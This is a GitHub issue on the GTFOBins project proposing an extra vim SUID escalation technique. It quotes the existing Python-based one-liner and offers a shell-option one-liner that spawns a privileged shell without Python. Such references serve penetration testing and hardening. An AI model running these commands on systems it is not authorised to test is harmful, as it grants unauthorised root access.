Additional vim SUID exploitation option?

GTFOBins / GTFOBins.github.io

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems

https://gtfobins.github.io

GNU General Public License v3.0

10.62k stars 1.31k forks source link

Open 0xarnout opened 3 months ago

0xarnout commented 3 months ago

Hi!

The section about SUID with only mentoins this option:

./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

This can be added:

./vim -c ':set shell=/bin/sh\ -p|shell'

benefit is that this doesn't require python support.

0xarnout commented 1 month ago

@cyrus-and can you take a look at this? If you need any clarification please tell me!